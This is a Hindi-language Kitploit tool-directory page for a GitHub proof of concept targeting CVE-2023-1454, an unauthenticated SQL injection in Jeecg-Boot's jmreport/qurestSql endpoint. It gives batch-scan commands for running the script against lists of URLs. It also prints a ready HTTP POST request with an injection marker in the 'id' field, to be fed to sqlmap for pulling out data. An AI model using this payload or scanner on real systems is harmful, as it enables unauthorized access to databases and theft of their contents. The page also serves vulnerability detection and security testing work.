Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-1454 — CVE-2023-1454,Jeecg-Boot फ्रंट-एंड SQL इंजेक्शन,CVE-2023-1454 बैच डिटेक्शन | Kitploit
उपकरण/GitHubGitHub/padbergpete47/cve-2023-1454
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubpadbergpete47/cve-2023-1454

CVE-2023-1454

CVE-2023-1454,Jeecg-Boot फ्रंट-एंड SQL इंजेक्शन,CVE-2023-1454 बैच डिटेक्शन

रिपॉजिटरी देखें
823 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-1454

jmreport/qurestSql अनधिकृत SQL इंजेक्शन बैच स्कैन POC Jeecg-Boot Spring Boot और Jeecg-Boot-Plus पर आधारित एक तीव्र विकास मंच है। नवीनतम jeecg-boot 3.5.0 में कई SQL इंजेक्शन कमजोरियाँ पाई गईं।

विवरण

मूल टूल पता

मूल टूल में गलत सकारात्मक (false positive) दर अधिक थी, इसलिए निर्णय की शर्तों में संशोधन किया गया और साथ ही कोड को अनुकूलित किया गया।

टूल उपयोग

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 एकल URL परीक्षण

python3 CVE-2023-1454-scan.py -f url.txt बैच जाँच

स्कैन समाप्त होने के बाद, वर्तमान निर्देशिका में कमजोर URL वाली vuln.txt फ़ाइल बनाई जाएगी।

poc:

exp:

डेटा पैकेट को txt के रूप में सहेजें, sqlmap का उपयोग करके डेटा प्राप्त किया जा सकता है।

root@kitploit:~
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

अस्वीकरण

इस दस्तावेज़ में दी गई जानकारी के प्रसार या उपयोग से होने वाले किसी भी प्रत्यक्ष या अप्रत्यक्ष परिणाम और हानि के लिए उपयोगकर्ता स्वयं जिम्मेदार है; लेखक इसके लिए कोई जिम्मेदारी नहीं लेता है।

टूल डाउनलोड करें